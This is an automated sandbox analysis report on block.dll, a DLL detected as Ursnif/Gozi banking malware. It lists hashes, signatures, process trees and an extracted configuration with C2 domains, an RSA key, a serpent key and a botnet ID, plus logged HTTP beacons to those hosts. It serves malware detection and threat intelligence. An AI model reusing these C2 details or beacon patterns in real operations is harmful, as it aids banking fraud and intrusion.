Analysis Report block.dll

Overview

General Information

Sample Name: block.dll
Analysis ID: 403080
MD5: 5a7c87dab250cee78ce63ac34117012b
SHA1: 554c4ccf2341182768d475087d8a8bcfaa525a12
SHA256: 8a26c32848c9ea085505359f67927d1a744ec07303ed0013e592eca6b4df4790
Tags: DLL, Gozi, ISFB, Ursnif

Detection

Ursnif
Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected Ursnif
Yara detected Ursnif
Writes or reads registry keys via WMI
Writes registry values via WMI
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the installation date of Windows
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification (classification graph not reproduced)

Startup

  • System is w10x64
  • loaddll32.exe (PID: 5720 cmdline: loaddll32.exe 'C:\Users\user\Desktop\block.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 4516 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\block.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5752 cmdline: rundll32.exe 'C:\Users\user\Desktop\block.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5592 cmdline: rundll32.exe C:\Users\user\Desktop\block.dll,Pape1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 4648 cmdline: rundll32.exe C:\Users\user\Desktop\block.dll,Riverslow MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • iexplore.exe (PID: 5856 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6328 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5856 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 6452 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5856 CREDAT:17414 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 5708 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5816 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5708 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 6100 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5708 CREDAT:17414 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 6616 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6480 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6616 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 1972 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6616 CREDAT:17414 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "8oKmD0Ib40VYxHRgT7OnHwlxmK3U2F2Fl3GpR9KrKxvSCrIeiCLZWlQ2QCt+AnP+N5tCnTTv45/b0/D8Eb4xqxiXBnUy/ADWorQScIoNIPfBQqutzO+Ozy/mev4m2eZAuMivS2UNJVH4DVsYsAkGAC4GR+aszytDfGSZp3MklfgRJ6Noj034BrS4tQl5qmeWhJa+Of/CLdmkCwJurSEhMKu3NK7g4EVzni8lIJrDkWNCTaVL4CWXewbAOJFPwh8Y/20KkHTZmVKLmJJRcSj8yyH0avZDtWvJHRDxiI+JYUar2ia3phWwtqVzVhzYzz8aoUVzmlt840TF55o2e8TRUCEZNNmvmluqgNZzQuNIj68=", "c2_domain": ["app.buboleinov.com", "chat.veminiare.com", "chat.billionady.com", "app3.maintorna.com"], "botnet": "1500", "server": "580", "serpent_key": "ZQktwkM8O9lYn9oX", "sleep_time": "10", "SetWaitableTimer_value": "10"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000004.00000003.353402660.0000000005A48000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000004.00000003.353461083.0000000005A48000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000001.00000003.352720988.0000000003D28000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000001.00000003.352839215.0000000003D28000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000001.00000003.352637772.0000000003D28000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
(17 further entries not shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
1.3.loaddll32.exe.1678d29.0.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
4.3.rundll32.exe.3058d29.0.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
4.2.rundll32.exe.6dd30000.3.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
1.2.loaddll32.exe.6dd30000.2.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
3.3.rundll32.exe.3f58d29.0.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
(1 further entry not shown)

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 5.3.rundll32.exe.4d58d29.0.raw.unpack | Malware Configuration Extractor: Ursnif (configuration as listed under Malware Configuration above)
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_033D35A1 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError
Source: block.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: Binary string: c:\Whether\class\156\Through\How.pdb source: block.dll
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_033D4E9C Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree
Source: global traffic | HTTP traffic detected: GET /u9JBOXOyCt1J/Cqk3pF0_2B2/evko0P1iOLkfYu/tE8kijPwXl6fpTUvGY0L0/uKSRiZsz1TrVOn7H/lYNbZbDXpFfEDld/SZEdzjQiJ4mBJjhxQf/lliemLK4E/fjiV_2FMKJMbBd5i_2F6/V_2Fz7Tym384w5xw_2F/kNwSikyIWBdKPim7R9vGWb/gFLpN9hJBqDsa/ZkxxO_2B/g7xuaBcPsCTSbIA7GEQ7zhu/w_2FuzPVom/0RGTspDSMbay7GsRJ/O_2BvpZGrQEs/hpy5azZaVzk/tO8Yj0mAC2rNEA/7Y_2FaW8HQeMqJNFtj5QK/iv0XWUt_2F3/3R HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: app.buboleinov.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /zWr7XKiLQ_2F3QZ2bR/ZuzwfgbmQ/mjgvv5jUliwpj1wMmSf1/mVwZRrRJ02ozj18W4CC/_2FqTc0J0ACZs0Zo0yB15V/UkO_2BhXUEjqi/ylcme0uu/h88DPxTz52fwzk2KiAITqAX/y1YkE9ueOd/NzFODbcfeCN_2B548/9jGMMg_2FjQB/TCcN38_2FLl/w78Mf5LsU18OtD/O9ldbeaIz2YOBBV9govEw/if1bIKJhIzR9fYIT/Dva1E7_2F2LcgBj/3WJFp2Il273lx9FN_2/B45JK5S6v/rZZWdDOKWu65eMI2rNKK/RAsOHyLCy3eKhZf_2Fm/CD_2FuANPfLuHGjULRoA2Y/Paqy HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: app.buboleinov.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /hPJ75Rz1l0Yg172f0/W92Rc6NrZORu/agJ84T4GWPF/71Su9Jrd5ILrko/1XWo5CLa_2Bx1ycL2fXGF/76IsZupbi6IIIogp/P_2BrqGlfT6Z_2F/9HIF9QL_2Ffn95EjHz/EKpbgAout/m_2FkBfNGzNFhXOxCcqe/1zQKvOOwqE_2B22qrZS/vj3rmMMb_2BsLkd2AZhDC4/602lvjtm6dYcP/dyzgfgBT/A_2BC4eofqol5orEsMEQPWe/zZ6Swnuj_2/FM3kwbNjGbF9dztKO/5Sul25wMK_2F/fSrDDmSQa3P/LwvXQje5tWHJ24/YCtfl_2Bd9Wgni_2B/yKHW HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: chat.billionady.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /1Z7Zv_2Fo_2BBI/5yyu9xO7U6xQJUAU9LBdU/_2BZsJzv4AW1v4_2/FuBHkCgtXKYNI2J/fjLUpx4yvdGQ9xBWU8/nZ2UCR2Fn/6_2BJUjWbSDTFYEq01IK/G2MuJJozgl6fI_2Bxi6/8WHocMwy1m3c6beo7EybdT/0fZNT0A7jOYrz/ZJgKKaGn/V_2Bc6nIeAMBXcBQSTKS3tI/dRpB7HoFuq/5r0h_2Bic5oCoaHxQ/GZIQmnaYFeN7/lgmkXjg8R1P/o6CJiUeiWxo9TA/Om1BRSx_2BLEYhxw_2B1w/ztx7Xd1V_2BwFgLL/5ttSiFJbfjzPnDR/nMd_2BdWk4HTz_2Ftn/Va7N0lfshKE/mKz HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: chat.billionady.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /cDNEPwBarUn/ROJH1XYkRfSClQ/qONBPlQo8FxG6mQW9Ogcz/u7mo1Dj2PullrRPq/bR_2BFpPLx7OhU9/HJBhAhHBzmstPPDOE1/w6ebBa_2B/KX_2BOm6FIW3gd6Bvbnj/Sh9h8HN_2BONCwGgPQr/IY0nkmO9u18wIpqrmMTW3z/GWi0vHa3h_2Bj/6IH92Uhj/Iom39I56_2BMfY2_2BRDxU0/VfXOZ9_2BQ/hDbFynpSdJTA10_2B/DTN9zUXGBVIL/6pinDdbjTIZ/J8liN5BZT7oU_2/FDetd44m1Cdm74WjgwpWw/7RPnYCrU0gXGaG9w/dolpQdALprU5fVz/g9lnmYz4c/oMbk6u HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: app3.maintorna.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /6r_2FD5QsDWTjJjwzHfBaL/2HYJ2K06UlseV/lZ1msT18/ny_2FHLDol8VG6VjuFqLZ26/y1nZcgTjUQ/HL5YV0taxU5zFMebw/ouCjKnY1SB67/bctA52f0140/sHpnVH95T_2Fuj/QLIAvGeVws2XTmrrXV3BZ/psxvZSZg2i7jPF9N/caz3S5QCjepHp3W/l6q5V6Mw_2BHygdAjz/QFWLuSVDY/2iEYyTYQm6wj63ekurFy/nVWvwQ5A_2FY6vAZ0b2/ysxIi7hdttfqNZtbDq2s51/_2FLPh7LrbbPo/JhDaZ4qW/MGAYB_2BvyA3HE7Ywiz/pWy HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: app3.maintorna.com | Connection: Keep-Alive
Source: unknown | DNS traffic detected: queries for: app.buboleinov.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 03 May 2021 16:47:15 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Content-Encoding: gzip | Data Raw / Data Ascii: short gzip-compressed chunked body (raw dump omitted)
Source: ~DF036A3D1EB4248F1E.TMP.19.dr, {A33D02D2-AC7A-11EB-90E5-ECF4BB570DC9}.dat.19.dr | String found in binary or memory: http://app.buboleinov.com/u9JBOXOyCt1J/Cqk3pF0_2B2/evko0P1iOLkfYu/tE8kijPwXl6fpTUvGY0L0/uKSRiZsz1TrV
Source: {A33D02D4-AC7A-11EB-90E5-ECF4BB570DC9}.dat.19.dr | String found in binary or memory: http://app.buboleinov.com/zWr7XKiLQ_2F3QZ2bR/ZuzwfgbmQ/mjgvv5jUliwpj1wMmSf1/mVwZRrRJ02ozj18W4CC/_2Fq
Source: ~DFE60F766B8C74F7D6.TMP.36.dr, {CDCCBAD9-AC7A-11EB-90E5-ECF4BB570DC9}.dat.36.dr | String found in binary or memory: http://app3.maintorna.com/6r_2FD5QsDWTjJjwzHfBaL/2HYJ2K06UlseV/lZ1msT18/ny_2FHLDol8VG6VjuFqLZ26/y1nZ
Source: {CDCCBAD7-AC7A-11EB-90E5-ECF4BB570DC9}.dat.36.dr, ~DF7FEBD80971BE8B6A.TMP.36.dr | String found in binary or memory: http://app3.maintorna.com/cDNEPwBarUn/ROJH1XYkRfSClQ/qONBPlQo8FxG6mQW9Ogcz/u7mo1Dj2PullrRPq/bR_2BFpP
Source: {BF692A67-AC7A-11EB-90E5-ECF4BB570DC9}.dat.29.dr, ~DF183688B2D13937F7.TMP.29.dr | String found in binary or memory: http://chat.billionady.com/1Z7Zv_2Fo_2BBI/5yyu9xO7U6xQJUAU9LBdU/_2BZsJzv4AW1v4_2/FuBHkCgtXKYNI2J/fjL
Source: {BF692A65-AC7A-11EB-90E5-ECF4BB570DC9}.dat.29.dr | String found in binary or memory: http://chat.billionady.com/hPJ75Rz1l0Yg172f0/W92Rc6NrZORu/agJ84T4GWPF/71Su9Jrd5ILrko/1XWo5CLa_2Bx1yc

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match | File source: 00000001.00000003.299036321.0000000001670000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.294762520.0000000004D50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.286919905.0000000003050000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.285453583.0000000003F50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.3.loaddll32.exe.1678d29.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.3.rundll32.exe.3058d29.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.rundll32.exe.6dd30000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.loaddll32.exe.6dd30000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.rundll32.exe.3f58d29.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.rundll32.exe.4d58d29.0.raw.unpack, type: UNPACKEDPE
Yara detected Ursnif
Source: Yara match | File source: 00000004.00000003.353402660.0000000005A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.353461083.0000000005A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.352720988.0000000003D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.352839215.0000000003D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.352637772.0000000003D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.353493626.0000000005A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.353527674.0000000005A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.353601646.0000000005A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.353567176.0000000005A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.352699094.0000000003D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.352816951.0000000003D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.352743659.0000000003D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.353611757.0000000005A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.352664971.0000000003D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.352761373.0000000003D28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.353343104.0000000005A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 5720, type: MEMORY
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5752, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif
Source: the same Yara matches (memory dumps, unpacked PEs and process memory) listed under Key, Mouse, Clipboard, Microphone and Screen Capturing above
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_033D35A1 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError

System Summary:

Writes or reads registry keys via WMI
Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6DD318D1 GetProcAddress,NtCreateSection,memset
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6DD31B89 NtMapViewOfSection
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6DD32485 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_033D3CA1 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_033D81CD NtQueryVirtualMemory
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6DD32264
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6DD7348A
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6DD67AD7
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_033D7FA8
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_033D6609
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6DD7348A
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6DD67AD7
Source: block.dll | Binary or memory string: OriginalFilenameHow.dll8 vs block.dll
Source: classification engine | Classification label: mal72.troj.winDLL@24/69@6/2
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_033D19E7 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
Source: C:\Program Files\internet explorer\iexplore.exe | File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{A33D02D0-AC7A-11EB-90E5-ECF4BB570DC9}.dat
Source: C:\Program Files\internet explorer\iexplore.exe | File created: C:\Users\user\AppData\Local\Temp\~DF436970D6C9CDDC13.TMP
Source: block.dll | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Program Files\internet explorer\iexplore.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\block.dll,Pape1
Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\block.dll'
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\block.dll',#1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\block.dll',#1
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\block.dll,Riverslow
Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5856 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5856 CREDAT:17414 /prefetch:2
Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5708 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5708 CREDAT:17414 /prefetch:2
Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6616 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6616 CREDAT:17414 /prefetch:2
Source: C:\Windows\System32\loaddll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\SysWOW64\rundll32.exe | Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe | Automated click: OK
Source: Window Recorder | Window detected: More than 3 window changes detected
                      Source: block.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: block.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: block.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: block.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: block.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: block.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: block.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: c:\Whether\class\156\Through\How.pdb source: block.dll
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6DD31F31 LoadLibraryA,GetProcAddress,1_2_6DD31F31
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6DD32253 push ecx; ret 1_2_6DD32263
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6DD32200 push ecx; ret 1_2_6DD32209
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6DD64475 push ecx; ret 1_2_6DD64488
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6DD4446A push esi; ret 1_2_6DD4446B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6DD42403 push ebp; retf 1_2_6DD4244E
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6DD4243F push ebp; retf 1_2_6DD4244E
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6DD4677F push esi; iretd 1_2_6DD4678A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6DD3FE6C push ebx; retf 1_2_6DD3FE6D
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6DD45B7B push eax; ret 1_2_6DD45B7C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6DD4633B push edx; retf 1_2_6DD46345
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6DD7E175 push ds; iretd 1_2_6DD7E179
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6DD7D33E push dword ptr [ecx+4BFFD4DAh]; retf 1_2_6DD7D348
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_033DB163 push edx; iretd 4_2_033DB164
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_033D7F97 push ecx; ret 4_2_033D7FA7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_033D7C20 push ecx; ret 4_2_033D7C29
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_033DB67C push ss; retf 4_2_033DB690
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6DD64475 push ecx; ret 4_2_6DD64488
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6DD4446A push esi; ret 4_2_6DD4446B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6DD42403 push ebp; retf 4_2_6DD4244E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6DD4243F push ebp; retf 4_2_6DD4244E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6DD4677F push esi; iretd 4_2_6DD4678A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6DD3FE6C push ebx; retf 4_2_6DD3FE6D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6DD45B7B push eax; ret 4_2_6DD45B7C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6DD4633B push edx; retf 4_2_6DD46345
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6DD7E175 push ds; iretd 4_2_6DD7E179
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6DD7D33E push dword ptr [ecx+4BFFD4DAh]; retf 4_2_6DD7D348

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match | File source: 00000001.00000003.299036321.0000000001670000.00000040.00000001.sdmp, type: MEMORY
